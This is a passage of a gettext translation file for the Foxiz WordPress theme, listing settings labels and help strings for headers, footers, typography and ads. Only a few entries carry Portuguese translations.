backend/single-metaboxes.php:682 msgid "Enable or disable the top entry widgets for this post." msgstr "" #: backend/panels/single-post.php:313 msgid "Enable or disable the via bar at the bottom of the post content." msgstr "" #: backend/panels/design.php:363 backend/panels/design.php:371 #: backend/panels/design.php:379 backend/panels/design.php:387 #: backend/panels/design.php:395 msgid "Enable or disable this image crop size." msgstr "" #: backend/panels/general.php:18 msgid "Enable or disable tooltips when hovering on icons." msgstr "" #: backend/panels/single-post.php:707 msgid "" "Enable or disable top share section. This section will display below the " "single entry meta info." msgstr "" #: backend/panels/single-post.php:1220 msgid "" "Enable or disable visitors can rate and review all posts in the comment box." msgstr "" #: backend/panels/single-post.php:1176 msgid "Enable or disable visitors can rate and review on the post review." msgstr "" #: backend/single-metaboxes.php:484 msgid "" "Enable or disable visitors can rate and review this post in the comment box." msgstr "" #: backend/panels/optimized.php:130 msgid "" "Enable or disable website markup, helps to show the Search Box feature for " "brand SERPs and can help your website name to appear in search results." msgstr "" #: backend/panels/sidebar.php:56 msgid "Enable or disable widget block editor (WordPress 5.8 or above)." msgstr "" #: backend/panels/login.php:26 msgid "Enable or disable wp-login.php page style." msgstr "" #: backend/panels/optimized.php:145 msgid "Enable the Carousels (Item List) schema markup for your Homepage." msgstr "" #: backend/panels/optimized.php:83 msgid "Enable this option if all fonts in Typography panels is set." msgstr "" #: backend/panels/single-post.php:489 msgid "" "Enable this option if you would like to only show the primary category in " "the single post." msgstr "" #: backend/panels/bookmark.php:51 backend/panels/table-contents.php:125 msgid "Enable When" msgstr "" #: backend/single-metaboxes.php:489 msgid "Enable with Review" msgstr "" #: backend/panels/single-post.php:1180 msgid "Enable without Post Review" msgstr "" #: backend/panels/header.php:205 msgid "" "Ensure the option \"More Menu - Search Form\" is enabled when you select the " "\"More Menu Triggered\" option." msgstr "" #: backend/panels/header.php:286 msgid "" "Ensure this section set to Light Text if you select a dark sub-menu " "background." msgstr "" #: backend/panels/header.php:327 msgid "" "Ensure you have also set \"Dark Mode Colors\" if you use custom colors for " "the default mode." msgstr "" #: backend/panels/block-classic.php:39 backend/panels/block-grid.php:39 #: backend/panels/block-grid.php:204 backend/panels/block-grid.php:369 #: backend/panels/block-grid.php:542 backend/panels/block-grid.php:729 #: backend/panels/block-list.php:47 backend/panels/block-list.php:220 #: backend/panels/block-list.php:401 backend/panels/block-list.php:596 #: backend/panels/blog-pages.php:364 backend/panels/blog-pages.php:851 #: backend/panels/blog-pages.php:1265 backend/panels/blog-pages.php:1673 #: backend/panels/blog-pages.php:2165 backend/panels/bookmark.php:264 #: backend/panels/bookmark.php:712 backend/panels/design.php:31 #: backend/panels/single-post.php:470 backend/panels/single-post.php:479 #: backend/panels/typography.php:415 msgid "Entry Category" msgstr "" #: backend/category-settings.php:25 msgid "Entry Category Colors" msgstr "" #: backend/panels/typography.php:423 msgid "Entry Category Font" msgstr "" #: backend/panels/single-post.php:497 msgid "Entry Category Font Size" msgstr "" #: backend/panels/typography.php:75 msgid "Entry Excerpt" msgstr "" #: backend/panels/design.php:89 backend/panels/single-post.php:560 #: backend/panels/typography.php:464 msgid "Entry Meta" msgstr "" #: backend/category-settings.php:345 backend/panels/blog-pages.php:374 #: backend/panels/blog-pages.php:861 backend/panels/blog-pages.php:1275 #: backend/panels/blog-pages.php:1683 backend/panels/blog-pages.php:2175 #: backend/panels/bookmark.php:273 backend/panels/bookmark.php:721 msgid "Entry Meta Bar" msgstr "" #: backend/panels/typography.php:472 msgid "Entry Meta Font" msgstr "" #: backend/panels/design.php:98 msgid "Entry Meta Icons" msgstr "" #: backend/panels/single-post.php:570 msgid "Entry Meta Settings" msgstr "" #: backend/category-settings.php:358 backend/panels/block-classic.php:49 #: backend/panels/block-grid.php:49 backend/panels/block-grid.php:214 #: backend/panels/block-grid.php:379 backend/panels/block-grid.php:552 #: backend/panels/block-grid.php:739 backend/panels/block-list.php:57 #: backend/panels/block-list.php:230 backend/panels/block-list.php:411 #: backend/panels/block-list.php:606 backend/panels/blog-pages.php:383 #: backend/panels/blog-pages.php:870 backend/panels/blog-pages.php:1284 #: backend/panels/blog-pages.php:1692 backend/panels/blog-pages.php:2184 #: backend/panels/bookmark.php:282 backend/panels/bookmark.php:730 #: backend/panels/single-post.php:585 msgid "Entry Meta Tags" msgstr "" #: backend/single-metaboxes.php:676 msgid "Entry Widgets" msgstr "" #: backend/category-settings.php:397 backend/panels/blog-pages.php:424 #: backend/panels/blog-pages.php:911 backend/panels/blog-pages.php:1325 #: backend/panels/blog-pages.php:1733 backend/panels/blog-pages.php:2225 #: backend/panels/bookmark.php:323 backend/panels/bookmark.php:771 msgid "Excerpt" msgstr "" #: backend/category-settings.php:408 backend/panels/block-classic.php:90 #: backend/panels/block-grid.php:90 backend/panels/block-grid.php:255 #: backend/panels/block-grid.php:420 backend/panels/block-grid.php:593 #: backend/panels/block-grid.php:780 backend/panels/block-list.php:98 #: backend/panels/block-list.php:271 backend/panels/block-list.php:452 #: backend/panels/block-list.php:647 backend/panels/blog-pages.php:434 #: backend/panels/blog-pages.php:921 backend/panels/blog-pages.php:1335 #: backend/panels/blog-pages.php:1743 backend/panels/blog-pages.php:2235 #: backend/panels/bookmark.php:333 backend/panels/bookmark.php:781 msgid "Excerpt - Max Length" msgstr "" #: backend/category-settings.php:416 backend/panels/block-classic.php:97 #: backend/panels/block-grid.php:97 backend/panels/block-grid.php:262 #: backend/panels/block-grid.php:427 backend/panels/block-grid.php:600 #: backend/panels/block-grid.php:787 backend/panels/block-list.php:105 #: backend/panels/block-list.php:278 backend/panels/block-list.php:459 #: backend/panels/block-list.php:654 backend/panels/blog-pages.php:442 #: backend/panels/blog-pages.php:929 backend/panels/blog-pages.php:1343 #: backend/panels/blog-pages.php:1751 backend/panels/blog-pages.php:2243 #: backend/panels/bookmark.php:341 backend/panels/bookmark.php:789 msgid "Excerpt - Source" msgstr "" #: backend/panels/color.php:123 msgid "Excerpt Color" msgstr "" #: backend/category-settings.php:219 msgid "" "Exclude tag slugs for the latest blog. Separated by commas (for example: " "tagslug1,tagslug2,tagslug3)." msgstr "" #: backend/category-settings.php:218 msgid "Exclude Tags Slug" msgstr "" #: backend/class-tgm-plugin-activation.php:2389 msgid "External Source" msgstr "" #: backend/panels/single-post.php:723 backend/panels/single-post.php:862 #: backend/panels/single-post.php:1000 backend/panels/single-post.php:1633 #: templates/parts.php:591 msgid "Facebook" msgstr "" #: backend/panels/optimized.php:244 msgid "Facebook APP ID" msgstr "" #: backend/panels/optimized.php:253 msgid "Facebook Default Image" msgstr "" #: backend/panels/socials.php:28 msgid "Facebook URL" msgstr "" #: backend/panels/design.php:446 msgid "Fade" msgstr "" #: backend/single-metaboxes.php:667 msgid "Fake View Value" msgstr "" #: backend/panels/design.php:265 msgid "Fallback Meta" msgstr "" #: backend/single-metaboxes.php:251 msgid "Featured Caption" msgstr "" #: backend/single-metaboxes.php:243 msgid "Featured Crop Size" msgstr "" #: backend/panels/design.php:639 msgid "Featured GIF" msgstr "" #: backend/panels/design.php:294 backend/single-metaboxes.php:238 msgid "Featured Image" msgstr "" #: backend/category-settings.php:328 backend/panels/block-classic.php:31 #: backend/panels/block-grid.php:31 backend/panels/block-grid.php:196 #: backend/panels/block-grid.php:361 backend/panels/block-grid.php:534 #: backend/panels/block-grid.php:721 backend/panels/block-list.php:31 #: backend/panels/block-list.php:204 backend/panels/block-list.php:385 #: backend/panels/block-list.php:580 backend/panels/blog-pages.php:349 #: backend/panels/blog-pages.php:836 backend/panels/blog-pages.php:1250 #: backend/panels/blog-pages.php:1658 backend/panels/blog-pages.php:2150 #: backend/panels/bookmark.php:249 backend/panels/bookmark.php:697 msgid "Featured Image Size" msgstr "" #: backend/category-settings.php:86 msgid "Featured Images" msgstr "" #: backend/panels/block-list.php:39 backend/panels/block-list.php:212 #: backend/panels/block-list.php:393 backend/panels/block-list.php:588 msgid "Featured Position" msgstr "" #: backend/single-metaboxes.php:574 msgid "Final Summary" msgstr "" #: templates/blog.php:94 msgid "Find More:" msgstr "Encontrar mais" #: backend/panels/privacy.php:26 msgid "Fixed Bottom" msgstr "" #: backend/panels/amp.php:332 backend/panels/amp.php:392 #: backend/panels/amp.php:452 backend/panels/amp.php:513 #: backend/panels/amp.php:573 msgid "Fixed Height (90px)" msgstr "" #: backend/panels/privacy.php:24 msgid "Fixed Left" msgstr "" #: backend/panels/single-post.php:975 msgid "Fixed Left Area" msgstr "" #: backend/panels/amp.php:186 backend/panels/single-post.php:983 msgid "Fixed Left Share Bar" msgstr "" #: templates/parts.php:612 msgid "Flickr" msgstr "" #: backend/panels/socials.php:74 msgid "Flickr URL" msgstr "" #: backend/panels/ads.php:421 msgid "Float Left" msgstr "" #: backend/panels/ads.php:422 msgid "Float Right" msgstr "" #: backend/panels/single-post.php:82 msgid "Floating Video" msgstr "" #: backend/panels/single-post.php:83 msgid "Floating video on the screen on scroll." msgstr "" #: templates/parts.php:802 msgid "Follow" msgstr "" #: backend/panels/bookmark.php:456 msgid "Follow categories that you're interested in" msgstr "" #: backend/panels/bookmark.php:477 msgid "Follow Page URL" msgstr "" #: templates/footer.php:212 templates/header/templates.php:621 msgid "Follow US" msgstr "Nos siga nas redes sociais" #: templates/blog.php:465 templates/entry.php:1171 msgid "Follow: " msgstr "" #: backend/panels/design.php:704 msgid "Font Awesome" msgstr "" #: backend/panels/typography.php:91 msgid "Font Size" msgstr "" #: backend/panels/footer.php:15 msgid "Footer" msgstr "" #: backend/panels/amp.php:360 msgid "Footer - Ad Type" msgstr "" #: backend/panels/amp.php:388 msgid "Footer - Adsense Size" msgstr "" #: backend/panels/amp.php:400 msgid "Footer - AMP Custom Ad Script" msgstr "" #: includes/sidebars.php:105 msgid "Footer - Column 1" msgstr "" #: includes/sidebars.php:114 msgid "Footer - Column 2" msgstr "" #: includes/sidebars.php:123 msgid "Footer - Column 3" msgstr "" #: includes/sidebars.php:133 msgid "Footer - Column 4" msgstr "" #: includes/sidebars.php:144 msgid "Footer - Column 5" msgstr "" #: backend/panels/amp.php:372 msgid "Footer - Data Ad Client" msgstr "" #: backend/panels/amp.php:380 msgid "Footer - Data Ad Slot" msgstr "" #: includes/sidebars.php:96 msgid "Footer - Top Full Width" msgstr "" #: backend/panels/amp.php:354 msgid "Footer Ad Settings" msgstr "" #: backend/panels/single-post.php:290 msgid "Footer Area" msgstr "" #: backend/panels/footer.php:30 msgid "Footer Background" msgstr "" #: backend/panels/footer.php:136 msgid "Footer Bottom Section" msgstr "" #: backend/panels/header.php:156 backend/panels/header.php:388 msgid "Footer Copyright" msgstr "" #: backend/panels/footer.php:144 msgid "Footer Logo" msgstr "" #: backend/panels/header.php:149 backend/panels/header.php:381 msgid "Footer Menu" msgstr "" #: backend/panels/ads.php:454 msgid "Footer Slide Up" msgstr "" #: backend/panels/ads.php:462 msgid "Footer Slide Up Section" msgstr "" #: backend/panels/footer.php:23 msgid "Footer Style" msgstr "" #: backend/single-metaboxes.php:172 backend/single-metaboxes.php:949 msgid "Footer Template Shortcode" msgstr "" #: backend/panels/newsletter.php:55 msgid "Footer Text" msgstr "" #: backend/panels/newsletter.php:62 msgid "Footer URL" msgstr "" #: backend/panels/heading.php:104 msgid "Footer Widget Heading Layout" msgstr "" #: backend/panels/footer.php:80 msgid "Footer Widget Section" msgstr "" #: backend/panels/footer.php:120 msgid "Footer Widgets - Template Shortcode" msgstr "" #: backend/panels/footer.php:90 msgid "Footer Widgets Layout" msgstr "" #: backend/single-metaboxes.php:490 msgid "Force Enable for This Post" msgstr "" #: backend/panels/optimized.php:90 msgid "Force write Dynamic CSS to file" msgstr "" #: backend/panels/header.php:565 msgid "Form Description" msgstr "" #: backend/panels/header.php:558 msgid "Form Heading" msgstr "" #: backend/panels/header.php:572 msgid "Form Logo" msgstr "" #: backend/category-settings.php:18 msgid "Foxiz - Individual Category Settings" msgstr "" #: backend/install-plugins.php:19 msgid "Foxiz Core" msgstr "" #: backend/theme-options.php:219 msgid "Foxiz Panel" msgstr "" #: backend/install-plugins.php:71 #, php-format msgid "Foxiz recommends the following plugin: %1$s." msgstr "" #: backend/install-plugins.php:70 #, php-format msgid "Foxiz the following plugin: %1$s." msgstr "" #: backend/panels/design.php:318 msgid "From The Center" msgstr "" #: backend/panels/design.php:317 msgid "From The Top" msgstr "" #: backend/panels/ads.php:420 backend/panels/page.php:46 #: backend/panels/single-post.php:174 backend/panels/single-post.php:186 #: backend/single-metaboxes.php:75 msgid "Full Width" msgstr "" #: backend/panels/table-contents.php:116 backend/single-metaboxes.php:729 msgid "Full Width (1 Column)" msgstr "" #: backend/panels/header-style.php:61 backend/panels/header-style.php:355 #: backend/panels/header-style.php:605 msgid "Full Width (100%)" msgstr "" #: backend/panels/table-contents.php:114 backend/single-metaboxes.php:727 msgid "Full Width (2 Columns)" msgstr "" #: backend/panels/typography.php:704 msgid "Full Width Headline" msgstr "" #: backend/panels/typography.php:761 msgid "Full Width Tagline" msgstr "" #: backend/panels/design.php:362 msgid "G1- 330x220" msgstr "" #: backend/panels/design.php:370 msgid "G2 - 420x280" msgstr "" #: backend/panels/design.php:378 msgid "G3 - 615x410" msgstr "" #: backend/single-metaboxes.php:418 msgid "Gallery Format" msgstr "" #: backend/panels/design.php:484 msgid "Gallery Icon" msgstr "" #: backend/panels/design.php:507 msgid "Gallery Icon Color" msgstr "" #: backend/panels/single-post.php:132 backend/single-metaboxes.php:424 msgid "Gallery Layout" msgstr "" #: backend/panels/single-post.php:126 msgid "Gallery Post Format Layout" msgstr "" #: backend/panels/amp.php:40 backend/panels/bookmark.php:28 #: backend/panels/general.php:10 backend/panels/header.php:31 #: backend/panels/single-post.php:1590 msgid "General" msgstr "" #: backend/panels/design.php:303 backend/panels/header-style.php:24 #: backend/panels/header-style.php:318 backend/panels/header-style.php:569 #: backend/panels/page.php:24 backend/single-metaboxes.php:51 msgid "General Settings" msgstr "" #: backend/panels/general.php:11 msgid "General settings for your website." msgstr "" #: backend/panels/design.php:647 msgid "GIF Supported" msgstr "" #: backend/category-settings.php:150 backend/panels/blog-pages.php:148 #: backend/panels/blog-pages.php:685 backend/panels/blog-pages.php:1101 #: backend/panels/blog-pages.php:1509 backend/panels/blog-pages.php:2002 msgid "Global Blog Template Builder" msgstr "" #: backend/panels/color.php:15 msgid "Global Colors" msgstr "" #: backend/panels/header.php:50 msgid "Global Header Style" msgstr "" #: backend/panels/header.php:59 msgid "Global Header Template Shortcode" msgstr "" #: backend/panels/heading.php:35 msgid "Global Heading" msgstr "" #: backend/panels/heading.php:40 msgid "Global Heading Layout" msgstr "" #: backend/panels/color.php:28 msgid "Global Highlight Color" msgstr "" #: backend/panels/general.php:34 msgid "Global Search Placeholder" msgstr "" #: backend/panels/breadcrumb.php:23 msgid "Global Setting" msgstr "" #: backend/panels/sidebar.php:26 msgid "Global Sidebar Position" msgstr "" #: backend/panels/header.php:40 msgid "Global Site Header" msgstr "" #: backend/category-settings.php:155 backend/panels/blog-pages.php:153 #: backend/panels/blog-pages.php:691 backend/panels/blog-pages.php:1106 #: backend/panels/blog-pages.php:1515 backend/panels/blog-pages.php:2007 msgid "Global WP Query Template Shortcode" msgstr "" #: templates/single/review-comment.php:91 msgid "Good" msgstr "" #: templates/single/reviews.php:175 msgid "Good Stuff" msgstr "" #: backend/panels/block-grid.php:27 backend/panels/block-grid.php:192 msgid "grid" msgstr "" #: backend/panels/single-post.php:1340 msgid "Grid 1 (3 Columns)" msgstr "" #: backend/category-settings.php:244 backend/configs.php:451 #: backend/panels/block-grid.php:17 msgid "Grid 1 (Standard)" msgstr "" #: backend/category-settings.php:245 backend/configs.php:455 #: backend/panels/block-grid.php:182 msgid "Grid 2" msgstr "" #: backend/panels/bookmark.php:54 msgid "Guest and Logged Users" msgstr "" #: backend/panels/bookmark.php:71 msgid "Guest Bookmark Expiration" msgstr "" #: backend/configs.php:237 msgid "H1" msgstr "" #: backend/panels/typography.php:129 msgid "H1 Font" msgstr "" #: backend/panels/typography.php:121 msgid "H1 Tag" msgstr "" #: backend/configs.php:238 backend/panels/single-post.php:532 #: backend/single-metaboxes.php:224 msgid "H2" msgstr "" #: backend/panels/typography.php:178 msgid "H2 Font" msgstr "" #: backend/panels/typography.php:170 msgid "H2 Tag" msgstr "" #: backend/configs.php:239 backend/panels/single-post.php:533 #: backend/single-metaboxes.php:225 msgid "H3" msgstr "" #: backend/panels/typography.php:227 msgid "H3 Font" msgstr "" #: backend/panels/typography.php:219 msgid "H3 Tag" msgstr "" #: backend/configs.php:240 backend/panels/single-post.php:534 #: backend/single-metaboxes.php:226 msgid "H4" msgstr "" #: backend/panels/typography.php:276 msgid "H4 Font" msgstr "" #: backend/panels/typography.php:268 msgid "H4 Tag" msgstr "" #: backend/configs.php:241 backend/panels/single-post.php:535 #: backend/single-metaboxes.php:227 msgid "H5" msgstr "" #: backend/panels/typography.php:325 msgid "H5 Font" msgstr "" #: backend/panels/typography.php:317 msgid "H5 Tag" msgstr "" #: backend/configs.php:242 backend/panels/single-post.php:536 #: backend/single-metaboxes.php:228 msgid "H6" msgstr "" #: backend/panels/typography.php:374 msgid "H6 Font" msgstr "" #: backend/panels/typography.php:366 msgid "H6 Tag" msgstr "" #: backend/configs.php:844 msgid "Half banner (234x60)" msgstr "" #: backend/configs.php:854 msgid "Half Page (300x600)" msgstr "" #: backend/panels/table-contents.php:115 backend/single-metaboxes.php:728 msgid "Half Width" msgstr "" #: backend/panels/reaction.php:44 msgid "Happy" msgstr "" #: templates/header/templates.php:615 msgid "Have an existing account?" msgstr "Já tem uma conta?" #: backend/panels/header.php:16 msgid "Header" msgstr "" #: backend/panels/amp.php:300 msgid "Header - Ad Type" msgstr "" #: backend/panels/amp.php:328 msgid "Header - Adsense Size" msgstr "" #: backend/panels/amp.php:340 msgid "Header - AMP Custom Ad Script" msgstr "" #: backend/panels/amp.php:312 msgid "Header - Data Ad Client" msgstr "" #: backend/panels/amp.php:320 msgid "Header - Data Ad Slot" msgstr "" #: backend/panels/amp.php:294 msgid "Header Ad Settings" msgstr "" #: includes/sidebars.php:79 msgid "Header Advertising" msgstr "" #: backend/single-metaboxes.php:153 backend/single-metaboxes.php:930 msgid "Header Alert Bar" msgstr "" #: backend/panels/blog-pages.php:1968 backend/panels/header.php:408 #: backend/panels/header.php:462 msgid "Header Background" msgstr "" #: backend/category-settings.php:92 backend/panels/blog-pages.php:90 #: backend/panels/blog-pages.php:1084 backend/panels/blog-pages.php:1492 msgid "Header Background Style" msgstr "" #: backend/panels/header-style.php:80 msgid "Header Height" msgstr "" #: backend/panels/blog-pages.php:2390 msgid "Header Image" msgstr "" #: backend/panels/typography.php:893 msgid "Header Menus" msgstr "" #: backend/panels/header.php:738 msgid "Header Mini Cart" msgstr "" #: backend/panels/header.php:173 msgid "Header Search" msgstr "" #: backend/panels/header.php:195 msgid "Header Search Icon" msgstr "" #: backend/category-settings.php:56 backend/panels/blog-pages.php:37 #: backend/panels/blog-pages.php:603 backend/panels/blog-pages.php:1921 #: backend/panels/single-post.php:1555 backend/single-metaboxes.php:890 msgid "Header Style" msgstr "" #: backend/panels/header-style.php:15 msgid "Header Style 1,2,3" msgstr "" #: backend/panels/header-style.php:309 msgid "Header Style 4" msgstr "" #: backend/panels/header-style.php:560 msgid "Header Style 5" msgstr "" #: backend/category-settings.php:64 backend/panels/blog-pages.php:60 #: backend/panels/blog-pages.php:626 backend/panels/blog-pages.php:1944 #: backend/panels/woocommerce.php:60 backend/single-metaboxes.php:121 #: backend/single-metaboxes.php:898 msgid "Header Template Shortcode" msgstr "" #: backend/panels/header-style.php:56 backend/panels/header-style.php:350 #: backend/panels/header-style.php:601 msgid "Header Width" msgstr "" #: backend/category-settings.php:182 backend/panels/blog-pages.php:204 #: backend/panels/blog-pages.php:2404 msgid "Heading" msgstr "" #: backend/panels/bookmark.php:133 backend/panels/bookmark.php:483 msgid "Heading background Style" msgstr "" #: backend/panels/heading.php:129 msgid "Heading Color" msgstr "" #: backend/panels/heading.php:15 msgid "Heading Design" msgstr "" #: backend/panels/typography.php:1038 msgid "Heading Font" msgstr "" #: backend/category-settings.php:205 backend/panels/blog-pages.php:227 #: backend/panels/bookmark.php:540 backend/panels/single-post.php:1327 msgid "Heading Font Size (Desktop)" msgstr "" #: backend/category-settings.php:197 backend/panels/blog-pages.php:219 #: backend/panels/bookmark.php:532 backend/panels/single-post.php:1319 msgid "Heading HTML Tag" msgstr "" #: backend/category-settings.php:189 backend/panels/blog-pages.php:211 #: backend/panels/bookmark.php:524 backend/panels/single-post.php:1311 msgid "Heading Layout" msgstr "" #: backend/panels/table-contents.php:50 msgid "Heading Tag Supported" msgstr "" #: backend/panels/typography.php:1039 msgid "" "Heading tag will use default H tag font settings. Select font values if you " "would like to choose a custom font." msgstr "" #: backend/single-metaboxes.php:750 msgid "Headings Table" msgstr "" #: templates/header/templates.php:289 msgid "Hi," msgstr "Olá," #: backend/panels/single-post.php:1442 msgid "" "Hide a part of content of next posts and show the button to increase page " "views." msgstr "" #: backend/panels/single-post.php:402 msgid "Hide Next/Prev Post pagination on the mobile device." msgstr "" #: backend/configs.php:861 msgid "Hide on Desktop" msgstr "" #: backend/panels/single-post.php:1465 msgid "Hide Sidebar on Mobile" msgstr "" #: backend/category-settings.php:466 backend/panels/block-classic.php:130 #: backend/panels/block-grid.php:130 backend/panels/block-grid.php:295 #: backend/panels/block-grid.php:460 backend/panels/block-grid.php:633 #: backend/panels/block-grid.php:820 backend/panels/block-list.php:138 #: backend/panels/block-list.php:311 backend/panels/block-list.php:492 #: backend/panels/block-list.php:687 backend/panels/blog-pages.php:491 #: backend/panels/blog-pages.php:978 backend/panels/blog-pages.php:1392 #: backend/panels/blog-pages.php:1800 backend/panels/blog-pages.php:2292 #: backend/panels/bookmark.php:390 backend/panels/bookmark.php:838 msgid "Hide the entry category on the tablet and mobile devices." msgstr "" #: backend/category-settings.php:496 backend/panels/block-classic.php:156 #: backend/panels/block-grid.php:156 backend/panels/block-grid.php:321 #: backend/panels/block-grid.php:486 backend/panels/block-grid.php:659 #: backend/panels/block-grid.php:846 backend/panels/block-list.php:164 #: backend/panels/block-list.php:337 backend/panels/block-list.php:518 #: backend/panels/block-list.php:713 backend/panels/blog-pages.php:521 #: backend/panels/blog-pages.php:1008 backend/panels/blog-pages.php:1422 #: backend/panels/blog-pages.php:1830 backend/panels/blog-pages.php:2322 #: backend/panels/bookmark.php:412 backend/panels/bookmark.php:868 msgid "Hide the post excerpt on the tablet and mobile devices." msgstr "" #: backend/panels/single-post.php:1466 msgid "Hide the post sidebar on the mobile device when load next posts." msgstr "" #: backend/panels/header.php:712 msgid "Hide this bar on the sticky navigation." msgstr "" #: backend/panels/header.php:711 msgid "Hide when Sticky" msgstr "" #: backend/mega-menu.php:142 msgid "Hierarchical" msgstr "" #: backend/category-settings.php:30 backend/panels/design.php:44 msgid "Highlight Color" msgstr "" #: backend/panels/color.php:23 msgid "Highlight Colors" msgstr "" #: backend/panels/single-post.php:544 msgid "Highlight Heading" msgstr "" #: backend/single-metaboxes.php:212 msgid "Highlight Point" msgstr "" #: backend/panels/single-post.php:1490 backend/panels/single-post.php:1499 msgid "Highlight Shares" msgstr "" #: backend/panels/single-post.php:546 msgid "Highlights" msgstr "" #: backend/panels/optimized.php:181 msgid "Home Description" msgstr "" #: backend/panels/header-style.php:140 backend/panels/header-style.php:218 #: backend/panels/header-style.php:284 backend/panels/header-style.php:428 #: backend/panels/header-style.php:507 backend/panels/header-style.php:695 #: backend/panels/header-style.php:773 msgid "Hover Accent Color" msgstr "" #: backend/panels/design.php:567 msgid "Hover Effects" msgstr "" #: backend/panels/header-style.php:132 backend/panels/header-style.php:210 #: backend/panels/header-style.php:276 backend/panels/header-style.php:420 #: backend/panels/header-style.php:499 backend/panels/header-style.php:687 #: backend/panels/header-style.php:765 msgid "Hover Text Color" msgstr "" #: backend/panels/single-post.php:529 msgid "HTML Tag" msgstr "" #: backend/panels/design.php:180 msgid "Human Time Format" msgstr "" #: backend/panels/single-post.php:218 msgid "Hyperlink Color" msgstr "" #: backend/panels/single-post.php:200 msgid "Hyperlink Settings" msgstr "" #: backend/panels/single-post.php:205 msgid "Hyperlink Style" msgstr "" #: backend/panels/single-post.php:234 msgid "Hyperlink Underline" msgstr "" #: backend/panels/header.php:550 msgid "Icon" msgstr "" #: backend/mega-menu.php:238 msgid "Icon Classname" msgstr "" #: backend/panels/ads.php:39 msgid "" "If you use auto ads code, you need to disable any other adsense units code." msgstr "" #: backend/panels/design.php:246 msgid "" "If you use font Awesome. ensure that the setting in \"Theme Design > Font " "Awesome\" is enabled." msgstr "" #: backend/single-metaboxes.php:344 backend/single-metaboxes.php:392 msgid "Iframe Embed Code" msgstr "" #: backend/panels/dark-mode.php:35 msgid "Image Opacity" msgstr "" #: backend/panels/typography.php:488 msgid "Important Meta Font" msgstr "" #: backend/panels/header-style.php:89 backend/panels/header-style.php:377 #: backend/panels/header-style.php:644 msgid "" "In case you would like to switch layout and text to light when set a dark " "background for sub menu in light mode." msgstr "" #: backend/panels/single-post.php:1374 msgid "Infinite Scroll" msgstr "" #: backend/configs.php:563 backend/panels/bookmark.php:575 msgid "Infinite Scroll (Ajax)" msgstr "" #: backend/panels/amp.php:541 msgid "Inline - Ad Type" msgstr "" #: backend/panels/amp.php:569 msgid "Inline - Adsense Size" msgstr "" #: backend/panels/amp.php:581 msgid "Inline - AMP Custom Ad Script" msgstr "" #: backend/panels/amp.php:553 msgid "Inline - Data Ad Client" msgstr "" #: backend/panels/amp.php:561 msgid "Inline - Data Ad Slot" msgstr "" #: backend/panels/single-post.php:1259 msgid "Inline Content Related Box" msgstr "" #: backend/panels/ads.php:265 msgid "Inline Single Content" msgstr "" #: backend/panels/amp.php:535 msgid "Inline Single Content Ad Settings" msgstr "" #: backend/panels/typography.php:593 msgid "Input & Textarea Font" msgstr "" #: backend/panels/blog-pages.php:154 backend/panels/blog-pages.php:1107 #: backend/panels/blog-pages.php:1516 backend/panels/blog-pages.php:2008 msgid "" "Input a \"Ruby Template\" shortcode to display as the main blog posts, ie: " "[Ruby_E_Template id=\"1\"]." msgstr "" #: backend/panels/blog-pages.php:120 msgid "" "Input a \"Ruby Template\" shortcode to embed it after the category header, " "ie: [Ruby_E_Template id=\"1\"]" msgstr "" #: backend/category-settings.php:130 msgid "" "Input a \"Ruby Template\" shortcode to embed it after this category header, " "ie: [Ruby_E_Template id=\"1\"]" msgstr "" #: backend/panels/blog-pages.php:659 msgid "" "Input a \"Ruby Template\" shortcode to embed it the bottom of the blog page, " "ie: [Ruby_E_Template id=\"1\"]" msgstr "" #: backend/panels/blog-pages.php:650 msgid "" "Input a \"Ruby Template\" shortcode to embed it the top of the blog page, ie:" " [Ruby_E_Template id=\"1\"]" msgstr "" #: backend/category-settings.php:156 msgid "" "Input a \"Ruby Template\" shortcode to show it as a the main blog listing " "for this category." msgstr "" #: backend/panels/blog-pages.php:692 msgid "" "Input a \"Ruby Template\" shortcode to show it as a the main blog listing." msgstr "" #: backend/panels/design.php:330 msgid "Input a custom crop size: width x height. For example: 300x200" msgstr "" #: backend/panels/single-post.php:498 msgid "Input a custom font size value (in px) for the single entry category." msgstr "" #: backend/panels/blog-pages.php:228 msgid "" "Input a custom font size value for the category heading (px) on the desktop." msgstr "" #: backend/category-settings.php:206 msgid "" "Input a custom font size value for this heading (px) on the desktop. Leave " "this option blank to set the default value." msgstr "" #: backend/panels/bookmark.php:541 backend/panels/single-post.php:1328 msgid "" "Input a custom font size value for this heading (px) on the desktop. Leave " "this option blank to set the default." msgstr "" #: backend/panels/header.php:603 msgid "Input a custom forget password URL if have." msgstr "" #: backend/panels/single-post.php:1754 msgid "" "Input a custom height value (px) for this bar. Leave blank to set it as the " "default." msgstr "" #: backend/panels/header.php:354 msgid "Input a custom height value for the mobile navigation, Default is 40px." msgstr "" #: backend/panels/header.php:596 msgid "Input a custom register URL if have." msgstr "" #: backend/panels/design.php:686 msgid "Input a custom round corner (in px) for your website." msgstr "" #: backend/panels/design.php:436 msgid "" "Input a custom time value to next a slide in milliseconds (default is 5000)." msgstr "" #: backend/panels/ads.php:495 msgid "" "Input a delay time (ms) value to show the slide up after the site loaded." msgstr "" #: backend/panels/adblock.php:34 msgid "Input a description for the adblock popup." msgstr "" #: backend/panels/ads.php:410 msgid "Input a description for the adverting box." msgstr "" #: backend/panels/header.php:566 msgid "" "Input a description for the login form. Leave blank to set it as the default." msgstr "" #: backend/panels/header.php:278 msgid "Input a destination URL for the notification panel." msgstr "" #: backend/panels/footer.php:208 msgid "Input a font size value (in px) for the copy right text." msgstr "" #: backend/panels/footer.php:114 msgid "" "Input a font size value (in px) for the default menu widgets are displaying " "in the footer." msgstr "" #: backend/panels/footer.php:214 msgid "Input a font size value (in px) for the footer copyright menu." msgstr "" #: backend/panels/newsletter.php:56 msgid "Input a footer text for the box." msgstr "" #: backend/panels/header.php:188 msgid "Input a heading for displaying above the search form." msgstr "" #: backend/panels/blog-pages.php:2405 msgid "" "Input a heading for the 404 page. Leave this option blank to set it as the " "default." msgstr "" #: backend/panels/single-post.php:545 msgid "Input a heading for the highlights section if it is existing." msgstr "" #: backend/panels/header.php:559 msgid "Input a heading for the login form." msgstr "" #: backend/panels/blog-pages.php:205 msgid "" "Input a heading for the post listing. Leave blank to disable this section" msgstr "" #: backend/category-settings.php:183 msgid "" "Input a heading for the post listing. Leave this option blank to set the " "default." msgstr "" #: backend/panels/bookmark.php:105 backend/panels/bookmark.php:448 #: backend/panels/bookmark.php:519 msgid "Input a heading for this section." msgstr "" #: backend/panels/single-post.php:1305 msgid "Input a heading for this section. Leave -1 to disable this heading." msgstr "" #: backend/panels/amp.php:98 backend/panels/footer.php:159 msgid "Input a height for value for the footer logo, Default is 